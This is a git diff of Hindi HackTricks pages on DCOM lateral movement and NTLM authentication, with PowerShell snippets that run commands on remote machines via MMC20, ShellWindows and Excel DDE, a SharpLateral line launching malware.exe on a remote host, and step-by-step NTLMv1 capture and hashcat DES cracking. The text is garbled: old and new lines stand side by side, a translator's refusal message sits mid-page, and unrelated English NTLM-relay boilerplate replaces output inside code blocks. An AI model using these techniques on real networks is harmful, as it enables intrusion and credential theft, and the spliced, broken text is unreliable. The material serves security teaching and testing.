वितरित कपोनेंट ऑब्जेक्ट मॉडल (DCOM) ऑब्ज
```bash
Get-CimInstance Win32_DCOMApplication
```
@ -46,13 +46,11 @@ $com | Get-Member
ls \\10.10.10.10\c$\Users
```
अधिक जानकारी के लिए [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/) देखें
अधिक जानकारी के लिए [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/) देखें
## ShellWindows & ShellBrowserWindow
**MMC20.Application** ऑब्जेक्ट का पता लगाया गया कि यह "LaunchPermissions" को स्पष्ट रूप से अभाविप्त करता है, जो प्रशासकों को पहुंचने की अनुमति देता है। अधिक विवरणों के लिए, एक थ्रेड [यहाँ](https://twitter.com/tiraniddo/status/817532039771525120) जांचा जा सकता है, और [@tiraniddo](https://twitter.com/tiraniddo) के OleView .NET का उपयोग किया जाता है।
दो विशेष ऑब्ज
**MMC20.Application** ऑब्जेक्ट का पता लगाया गया कि इसमें व्याख्यात "LaunchPermissions" की कमी है, जो प्रशासकों को पहुंचने की अनुमति देती है। अधिक विवरणों के लिए, एक थ्रेड [यहाँ](https://twitter.com/tiraniddo/status/817532039771525120) जांचा जा सकता है, और [@tiraniddo](https://twitter.com/tiraniddo) के OleView .NET का उपयोग विशेष रूप से विन्यासित अनुमतियों के बिना ऑब्ज
```powershell
$com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
$obj = [System.Activator]::CreateInstance($com)
@ -61,9 +59,9 @@ $item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\sy
```
### Excel DCOM ऑब्जेक्ट के साथ लैटरल मूवमेंट
लैटरल मूवमेंट को DCOM Excel ऑब्जेक्ट का शोषण करके प्राप्त किया जा सकता है। विस्तृत जानकारी के लिए, सुझाव दिया जाता है कि [Cybereason's blog](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom) पर DCOM के माध्यम से लैटरल मूवमेंट के लिए Excel DDE का उपयोग करने पर चर्चा की जाए
लैटरल मूवमेंट को DCOM Excel ऑब्जेक्ट का शोषण करके प्राप्त किया जा सकता है। विस्तृत जानकारी के लिए, सुझाव दिया जाता है कि [Cybereason's blog](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom) पर DCOM के माध्यम से Excel DDE का उपयोग करने पर चर्चा पढ़ें
Empire परियोजना एक PowerShell स्क्रिप्ट प्रदान करती है, जो Excel का उपयोग द्वारा दूरस्थ कोड निष्पादन (RCE) का प्रदर्शन करता है जिसे DCOM ऑब्जेक्ट को मानिपुलेट करके किया जाता है। नीचे [Empire's GitHub repository](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1) पर उपलब्ध स्क्रिप्ट से अलग-अलग विधियों का प्रदर्शन करते हुए Excel का दुरुपयोग करने के लिए RCE के लिए:
Empire परियोजना एक PowerShell स्क्रिप्ट प्रदान करती है, जो Excel का उपयोग द्वारा दूरस्थ कोड क्रियान्वयन (RCE) का प्रदर्शन करता है, DCOM ऑब्जेक्ट को मानिपुरित करके। नीचे [Empire's GitHub repository](https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1) पर उपलब्ध स्क्रिप्ट से अलग-अलग विधियों का प्रदर्शन करने वाले अंश हैं:
```powershell
# Detection of Office version
elseif ($Method -Match "DetectOffice") {
@ -90,16 +88,16 @@ $Obj.DDEInitiate("cmd", "/c $Command")
इन तकनीकों को स्वचालित करने के लिए दो उपकरणों को उजागर किया गया है:
- **Invoke-DCOM.ps1**: एक PowerShell स्क्रिप्ट जो विभिन्न विधियों को आसानी से अभिवादन करने के लिए उपयुक्त है जिससे दूरस्थ मशीनों पर कोड का निष्पादन किया जा सकता है। यह स्क्रिप्ट Empire GitHub भंडार में उपलब्ध है।
- **Invoke-DCOM.ps1**: एक PowerShell स्क्रिप्ट जो विभिन्न विधियों को आसानी से अभिवादन करने के लिए उपयुक्त है जो दूरस्थ मशीनों पर कोड का अभिवादन करने के लिए। यह स्क्रिप्ट Empire GitHub भंडार में उपलब्ध है।
- **SharpLateral**: एक उपकरण जो दूरस्थ स्थान पर कोड का निष्पादन करने के लिए डिज़ाइन किया गया है, जिसे निम्नलिखित कमांड के साथ उपयोग किया जा सकता है:
- **SharpLateral**: एक उपकरण जो दूरस्थ स्थान पर कोड का अभिवादन करने के लिए डिज़ाइन किया गया है, जिसे निम्नलिखित कमांड के साथ उपयोग किया जा सकता है:
```bash
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
```
## स्वचालित उपकरण
* Powershell स्क्रिप्ट [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Empire/blob/master/data/module\_source/lateral\_movement/Invoke-DCOM.ps1) को आसानी से अन्य मशीनों में कोड निष्पादित करने के सभी टिप्पणीत तरीकों को आमंत्रित करने की अनुमति देता है।
* आप [**SharpLateral**](https://github.com/mertdas/SharpLateral) भी उपयोग कर सकते हैं:
* Powershell स्क्रिप्ट [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Empire/blob/master/data/module\_source/lateral\_movement/Invoke-DCOM.ps1) का उपयोग अन्य मशीनों में कोड निष्पादित करने के सभी टिप्पणीत तरीकों को आसानी से आमंत्रित करने की अनुमति देता है।
* आप [**SharpLateral**](https://github.com/mertdas/SharpLateral) का भी उपयोग कर सकते हैं:
```bash
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
```
@ -110,7 +108,7 @@ SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे सुरक्षा दोषों को खोजें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, API से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**आज ही मुफ्त में इसका प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
वे सुरक्षा दोष खोजें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणात्मक खतरा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, API से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**इसे मुफ्त में आज़माएं**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -120,10 +118,10 @@ SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* यदि आप अपनी कंपनी का **विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएँ देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PRs सबमिट करके।
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का पालन करें।**
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>

View file

@ -4,33 +4,33 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **hacktricks repo में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें** और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
## मूल जानकारी
**NTLM Credentials**: डोमेन नाम (यदि कोई हो), उपयोगकर्ता नाम और पासवर्ड हैश.
**NTLM Credentials**: डोमेन नाम (यदि कोई है), उपयोगकर्ता नाम और पासवर्ड हैश।
**LM** केवल **Windows XP और सर्वर 2003** में **सक्षम** है (LM हैशेज को क्रैक किया जा सकता है). LM हैश AAD3B435B51404EEAAD3B435B51404EE का मतलब है कि LM का उपयोग नहीं किया जा रहा है (यह खाली स्ट्रिंग का LM हैश है).
**LM** केवल **Windows XP और सर्वर 2003** में **सक्षम** है (LM हैश को क्रैक किया जा सकता है) LM हैश AAD3B435B51404EEAAD3B435B51404EE का मतलब है कि LM का उपयोग नहीं हो रहा है (खाली स्ट्रिंग का LM हैश है)।
डिफ़ॉल्ट रूप से **Kerberos** का **उपयोग किया जाता है**, इसलिए NTLM केवल तब उपयोग किया जाएगा जब **कोई Active Directory कॉन्फ़िगर नहीं की गई हो,** **डोमेन मौजूद न हो**, **Kerberos काम नहीं कर रहा हो** (खराब कॉन्फ़िगरेशन) या **क्लाइंट** वैध होस्ट-नाम के बजाय IP का उपयोग करके कनेक्ट करने की कोशिश करता है.
डिफ़ॉल्ट रूप से **Kerberos** का उपयोग होता है, इसलिए NTLM का उपयोग केवल तब होगा जब **कोई Active Directory कॉन्फ़िगर नहीं है**, **डोमेन मौजूद नहीं है**, **Kerberos काम नहीं कर रहा है** (बुरी कॉन्फ़िगरेशन) या **वालिड होस्ट-नाम की बजाय IP का उपयोग करने वाला क्लाइंट** कोनेक्ट करने की कोशिश करता है।
**NTLM प्रमाणीकरण** के **नेटवर्क पैकेट्स** में "**NTLMSSP**" **हेडर** होता है.
**NTLM प्रमाणीकरण** के **नेटवर्क पैकेट** के **हेडर** में "**NTLMSSP**" होता है।
प्रोटोकॉल: LM, NTLMv1 और NTLMv2 %windir%\Windows\System32\msv1\_0.dll में समर्थित हैं
प्रोटोकॉल: LM, NTLMv1 और NTLMv2 को DLL %windir%\Windows\System32\msv1\_0.dll में समर्थित किया गया है।
## LM, NTLMv1 और NTLMv2
आप जांच सकते हैं और कॉन्फ़िगर कर सकते हैं कि कौन सा प्रोटोकॉल उपयोग किया जाएगा:
आप जांच और कॉन्फ़िगर कर सकते हैं कि कौन सा प्रोटोकॉल उपयोग किया जाएगा:
### GUI
_secpol.msc_ निष्पादित करें -> स्थानीय नीतियाँ -> सुरक्षा विकल्प -> नेटवर्क सुरक्षा: LAN मैनेजर प्रमाणीकरण स्तर. यहाँ 6 स्तर हैं (0 से 5 तक).
_secpol.msc_ चलाएं -> स्थानीय नीतियाँ -> सुरक्षा विकल्प -> नेटवर्क सुरक्षा: LAN प्रबंधन प्रमाणीकरण स्तर। 6 स्तर हैं (0 से 5 तक)।
![](<../../.gitbook/assets/image (92).png>)
@ -51,52 +51,77 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t RE
```
## बेसिक NTLM डोमेन प्रमाणीकरण योजना
1. **उपयोगकर्ता** अपने **प्रमाण-पत्र** प्रस्तुत करता है
2. क्लाइंट मशीन **प्रमाणीकरण अनुरोध भेजती है**, **डोमेन नाम** और **उपयोगकर्ता नाम** सहित
1. **उपयोगकर्ता** अपने **प्रमाणपत्र** प्रस्तुत करता है
2. क्लाइंट मशीन **प्रमाणीकरण अनुरोध भेजती है** जिसमें **डोमेन नाम** और **उपयोगकर्ता नाम** भेजती है
3. **सर्वर** **चुनौती** भेजता है
4. **क्लाइंट** पासवर्ड के हैश का उपयोग करके **चुनौती को एन्क्रिप्ट** करता है और से प्रतिक्रिया के रूप में भेजता है
5. **सर्वर**, **डोमेन कंट्रोलर** को **डोमेन नाम, उपयोगकर्ता नाम, चुनौती और प्रतिक्रिया** भेजता है। यदि Active Directory कॉन्फ़िगर नहीं किया गया है या डोमेन नाम सर्वर का नाम है, तो प्रमाण-पत्र **स्थानीय रूप से जांचे जाते हैं**।
6. **डोमेन कंट्रोलर जांचता है कि सब कुछ सही है** और सर्वर को जानकारी भेजता है
4. **क्लाइंट** चुनौती को **पासवर्ड के हैश का उपयोग करके एन्क्रिप्ट** करता है और से प्रतिक्रिया के रूप में भेजता है
5. **सर्वर** **डोमेन कंट्रोलर** को **डोमेन नाम, उपयोगकर्ता नाम, चुनौती और प्रतिक्रिया** भेजता है। यदि **सक्रिय निर्देशिका** कॉन्फ़िगर नहीं है या डोमेन नाम सर्वर का नाम है, तो प्रमाणपत्र **स्थानीय रूप से जांची जाती है**।
6. **डोमेन कंट्रोलर** जांचता है कि सब कुछ सही है और सर्वर को जानकारी भेजता है
**सर्वर** और **डोमेन कंट्रोलर** **Netlogon** सर्वर के माध्यम से **सुरक्षित चैनल** बना सकते हैं क्योंकि डोमेन कंट्रोलर को सर्वर का पासवर्ड पता होता है (यह **NTDS.DIT** डेटाबेस के अंदर होता है)।
**सर्वर** और **डोमेन कंट्रोलर** को **नेटलॉगन** सर्वर के माध्यम से **सुरक्षित चैनल** बनाने में सक्षम होते हैं क्योंकि डोमेन कंट्रोलर सर्वर के पासवर्ड को जानता है (यह **NTDS.DIT** डेटाबेस में है)।
### लोकल NTLM प्रमाणीकरण योजना
### स्थानीय NTLM प्रमाणीकरण योजना
प्रमाणीकरण वही है जैसा कि **पहले उल्लेखित है** लेकिन **सर्वर** को **उपयोगकर्ता के हैश** का पता होता है जो **SAM** फाइल में प्रमाणीकरण की कोशिश करता है। इसलिए, डोमेन कंट्रोलर से पूछने के बजाय, **सर्वर स्वयं जांच करेगा** कि क्या उपयोगकर्ता प्रमाणीकरण कर सकता है।
प्रमाणीकरण उसी तरह है जैसा **पहले उल्लिखित** है, लेकिन **सर्वर** उस **उपयोगकर्ता के हैश को जानता है** जो **SAM** फ़ाइल में प्रमाणीकरण करने की कोशिश कर रहा है। इसलिए, डोमेन कंट्रोलर से पूछने की बजाय, **सर्वर खुद जांचेगा** कि क्या उपयोगकर्ता प्रमाणीकरण कर सकता है।
### NTLMv1 चुनौती
**चुनौती की लंबाई 8 बाइट्स** होती है और **प्रतिक्रिया 24 बाइट्स** लंबी होती है।
**चुनौती लंबाई 8 बाइट** है और **प्रतिक्रिया 24 बाइट** लंबी है।
**हैश NT (16बाइट्स)** को **3 भागों में 7बाइट्स प्रत्येक** में विभाजित किया जाता है (7B + 7B + (2B+0x00\*5)): **अंतिम भाग को शून्य से भरा जाता है**। फिर, **चुनौती** को प्रत्येक भाग के साथ **अलग-अलग सिफर** किया जाता है और **परिणामी** सिफर किए गए बाइट्स को **जोड़ा** जाता है। कुल: 8B + 8B + 8B = 24Bytes
**हैश NT (16 बाइट)** को **3 हिस्सों में विभाजित किया जाता है (प्रत्येक 7 बाइट)**: **आखिरी हिस्सा शून्यों से भरा होता है**। फिर, **चुनौती** को प्रत्येक हिस्से के साथ अलग-अलग **एन्क्रिप्ट** किया जाता है और परिणामी एन्क्रिप्टेड बाइट्स **जोड़े जाते हैं**। कुल: 8 बाइट + 8 बाइट + 8 बाइट = 24 बाइट
**समस्याएं**:
* **रैंडमनेस की कमी**
* 3 भागों को **अलग-अलग हमला** किया जा सकता है NT हैश पाने के लिए
* **DES को क्रैक किया जा सकता है**
* तीसरी कुंजी हमेशा **5 शून्यों** से बनी होती है।
* यदि **एक ही चुनौती** दी जाती है तो **प्रतिक्रिया** भी **वही** होगी। इसलिए, आप **चुनौती** के रूप में पीड़ित को "**1122334455667788**" का स्ट्रिंग दे सकते हैं और **पूर्वनिर्मित रेनबो टेबल्स** का उपयोग करके प्रतिक्रिया पर हमला कर सकते हैं।
* **अनियमितता की कमी**
* 3 हिस्से अलग-अलग **हमले किए जा सकते हैं** ताकि NT हैश पता लगाया जा सके
* **DES को तोड़ा जा सकता है**
* 3 वां कुंजी हमेशा **5 शून्यों** से मिलकर बनाई जाती है।
* **एक ही चुनौती** दिया जाएगा तो **प्रतिक्रिया** **समान** होगी। इसलिए, आप पीड़ित को **पूर्व-गणना रेनबो तालिकाओं** का उपयोग करके प्रतिक्रिया के लिए "**1122334455667788**" स्ट्रिंग को चुनौती दे सकते हैं और हमला कर सकते हैं।
### NTLMv1 हमला
आजकल Unconstrained Delegation कॉन्फ़िगर किए गए वातावरणों को पाना कम हो रहा है, लेकिन इसका यह मतलब नहीं है कि आप **Print Spooler सेवा का दुरुपयोग नहीं कर सकते**
आजकल अनकंशित डेलीगेशन कॉन्फ़िगर किए गए परिवेशों को ढूंढना कम हो रहा है, लेकिन यह यह नहीं मतलब है कि आप **प्रिंट स्पूलर सेवा** का दुरुपयोग नहीं कर सकते।
आप AD पर पहले से ही हासिल किए गए कुछ प्रमाण-पत्र/सत्रों का उपयोग करके **प्रिंटर से किसी ऐसे होस्ट के खिलाफ प्रमाणीकरण करने के लिए कह सकते हैं** जो आपके नियंत्रण में हो। फिर, `metasploit auxiliary/server/capture/smb` या `responder` का उपयोग करके आप **प्रमाणीकरण चुनौती को 1122334455667788 पर सेट कर सकते हैं**, प्रमाणीकरण प्रयास को कैप्चर कर सकते हैं, और यदि यह **NTLMv1** का उपयोग करके किया गया था तो आप इसे **क्रैक कर सकते हैं**।\
यदि आप `responder` का उपयोग कर रहे हैं तो आप **प्रमाणीकरण को डाउनग्रेड** करने के लिए `--lm` फ्लैग का **उपयोग करने की कोशिश कर सकते हैं**।\
_ध्यान दें कि इस तकनीक के लिए प्रमाणीकरण NTLMv1 का उपयोग करके किया जाना चाहिए (NTLMv2 मान्य नहीं है)।_
आप AD पर पहले से कुछ प्रमाणपत्र/सत्रों का दुरुपयोग करके **प्रिंटर से अनुरोध कर सकते हैं** कि वह आपके नियंत्रण के तहत किसी **होस्ट के खिलाफ प्रमाणीकरण** करें। फिर, `metasploit auxiliary/server/capture/smb` या `responder` का उपयोग करके आप **प्रमाणीकरण चुनौती को 1122334455667788** सेट कर सकते हैं, प्रमाणीकरण प्रयास को कैप्चर कर सकते हैं, और यदि यह **NTLMv1** के उपयोग से किया गया है तो आप इसे **तोड़ सकते हैं**।\
यदि आप `responder` का उपयोग कर रहे हैं तो आप \*\*ध्यान दें कि इस तकनीक के लिए प्रमाणीकरण को NTLMv1 का उपयोग करके किया जाना चाहिए (NTLMv2 मान्य नहीं है)।_
याद रखें कि प्रिंटर प्रमाणीकरण के दौरान कंप्यूटर खाते का उपयोग करेगा, और कंप्यूटर खाते **लंबे और यादृच्छिक पासवर्ड** का उपयोग करते हैं जिन्हें आप सामान्य **शब्दकोशों** का उपयोग करके **शायद क्रैक नहीं कर पाएंगे**। लेकिन **NTLMv1** प्रमाणीकरण **DES का उपयोग करता है** ([यहां अधिक जानकारी](./#ntlmv1-challenge)), इसलिए DES को क्रैक करने के लिए विशेष रूप से समर्पित कुछ सेवाओं का उपयोग करके आप इसे क्रैक कर पाएंगे (उदाहरण के लिए आप [https://crack.sh/](https://crack.sh) का उपयोग कर सकते हैं)।
ध्यान रखें कि प्रिंटर प्रमाणीकरण के दौरान कंप्यूटर खाता का उपयोग करेगा, और कंप्यूटर खाते का उपयोग **लंबा और यादृच्छिक पासवर्ड** करते हैं जिसे आप **सामान्य शब्दकोश** का उपयोग करके **तोड़ने** के लिए **संभावना नहीं है**। लेकिन **NTLMv1** प्रमाणीकरण **DES का उपयोग करता है** ([अधिक जानकारी यहाँ](./#ntlmv1-challenge)), इसलिए कुछ विशेष रूप से DES को तोड़ने के लिए सेवाओं का उपयोग करके आप इसे तोड़ सकते हैं (आप [https://crack.sh/](https://crack.sh) का उपयोग कर सकते हैं)।
### NTLMv1 हमला hashcat के साथ
### hashcat के साथ NTLMv1 हमला
NTLMv1 को NTLMv1 Multi Tool [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) का उपयोग करके भी तोड़ा जा सकता है जो NTLMv1 संदेशों को ऐसे तरीके से प्रारूपित करता है जिसे hashcat के साथ तोड़ा जा सकता है।
NTLMv1 को NTLMv1 मल्टी टूल [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) के साथ तोड़ा जा सकता है जो NTLMv1 संदेशों को एक ऐसी विधि में स्वरूपित करता है जिसे hashcat के साथ तोड़ा जा सकता है।
कमांड
आज्ञा
```
python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788
```
यह नीचे दिया गया होगा:
## NTLM Relay Attack
### Introduction
In an NTLM relay attack, an attacker intercepts the NTLM authentication traffic between a client and a server, and relays it to another server to authenticate as the original client. This attack can be used to gain unauthorized access to systems and resources.
### Steps to Perform NTLM Relay Attack
1. **Set Up a Rogue Server**: The attacker sets up a rogue server to intercept NTLM authentication requests from the client.
2. **Capture NTLM Authentication Traffic**: The rogue server captures the NTLM authentication traffic between the client and the legitimate server.
3. **Relay the Authentication**: The attacker relays the captured authentication traffic to another server to authenticate as the client.
4. **Gain Unauthorized Access**: By successfully relaying the authentication, the attacker gains unauthorized access to the target system or resource.
### Mitigation Techniques
To prevent NTLM relay attacks, consider implementing the following mitigation techniques:
- **Enforce SMB Signing**: Enabling SMB signing can help prevent NTLM relay attacks by ensuring the integrity of the SMB packets.
- **Use Extended Protection for Authentication**: Implement Extended Protection for Authentication to protect against NTLM relay attacks.
- **Disable NTLM**: Consider disabling NTLM authentication in favor of more secure authentication protocols like Kerberos.
By implementing these mitigation techniques, organizations can reduce the risk of falling victim to NTLM relay attacks.
```
['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']
@ -122,18 +147,38 @@ To crack with hashcat:
To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
```
एक फाइल बनाएं जिसमें निम्नलिखित सामग्री हो:
# NTLM Relay Attack
## Introduction
NTLM relay attacks are a common technique used by attackers to escalate privileges in a Windows environment. This attack involves intercepting NTLM authentication traffic and relaying it to other systems to gain unauthorized access.
## How it works
1. The attacker intercepts NTLM authentication traffic between a client and a server.
2. The attacker relays this traffic to another system, such as a file server or domain controller.
3. The target system processes the authentication request, believing it is coming from the original client.
4. If successful, the attacker gains unauthorized access to the target system using the compromised credentials.
## Mitigation
To mitigate NTLM relay attacks, consider implementing the following measures:
- Disable NTLM authentication in favor of more secure protocols like Kerberos.
- Enable SMB signing to prevent tampering with authentication traffic.
- Implement network segmentation to limit the scope of potential relay attacks.
- Regularly monitor and analyze network traffic for suspicious activity.
By following these best practices, organizations can reduce the risk of falling victim to NTLM relay attacks.
```
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
```
```
hashcat को चलाएं (hashtopolis जैसे उपकरण के माध्यम से वितरित करना सबसे अच्छा है) क्योंकि अन्यथा इसमें कई दिन लगेंगे।
```
अगर आपके पास हैशटोपोलिस जैसे टूल के माध्यम से वितरित हैशकैट को चलाएं, यह अन्यथा कई दिन ले सकता है।
```
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
```
इस मामले में हम जानते हैं कि इसका पासवर्ड password है इसलिए हम डेमो के उद्देश्य से चीट करने वाले हैं:
इस मामले में हमें इसका पासवर्ड पता है कि 'password' है, इसलिए हम डेमो के उद्देश्यों के लिए धोखा देंगे:
```
python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
@ -142,7 +187,7 @@ DESKEY2: bcba83e6895b9d
echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand
```
हमें अब hashcat-utilities का उपयोग करके क्रैक किए गए des keys को NTLM हैश के हिस्सों में परिवर्तित करने की आवश्यकता है:
हमें अब hashcat-utilities का उपयोग करना होगा ताकि क्रैक किए गए des कुंजी को NTLM हैश के हिस्सों में बदला जा सके:
```
./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1
@ -150,123 +195,145 @@ b4b9b02e6f09a9 # this is part 1
./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2
```
Since the provided text is not visible, I'm unable to translate it. Please provide the text you want to be translated into Hindi, and I'll be happy to assist you.
## NTLM
### Overview
NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. It is commonly used for authentication in Windows environments.
### NTLM Relay Attack
NTLM relay attack is a type of attack where an attacker captures the NTLM authentication request sent by a victim and relays it to a target server to gain unauthorized access. This attack can be mitigated by implementing security measures such as SMB signing, Extended Protection for Authentication, and LDAP signing.
### Protection
To protect against NTLM relay attacks, it is recommended to disable NTLM authentication in favor of more secure protocols like Kerberos. Additionally, enabling SMB signing, Extended Protection for Authentication, and LDAP signing can help prevent these attacks.
```
./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
586c # this is the last part
```
To provide an accurate translation, I need the specific English text from the file `windows-hardening/ntlm/README.md` that you want to be translated into Hindi. Please provide the text, and I will translate it for you while maintaining the markdown and HTML syntax.
## NTLM
### Overview
NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. It is commonly used in Windows environments for authentication purposes.
### NTLM Hashes
NTLM hashes are generated by hashing the user's password. These hashes can be used in various hacking techniques, such as pass-the-hash attacks, to gain unauthorized access to systems.
### Protecting Against NTLM Attacks
To protect against NTLM attacks, it is recommended to use stronger authentication methods such as Kerberos, enable SMB signing, and disable the use of NTLM where possible. Additionally, regularly changing passwords and monitoring for any suspicious activity can help mitigate the risk of NTLM attacks.
```
NTHASH=b4b9b02e6f09a9bd760f388b6700586c
```
### NTLMv2 चैलेंज
### NTLMv2 Challenge
**चैलेंज की लंबाई 8 बाइट्स है** और **2 प्रतिक्रियाएं भेजी जाती हैं**: एक **24 बाइट्स** लंबी होती है और **दूसरी** की लंबाई **परिवर्तनशील** होती है।
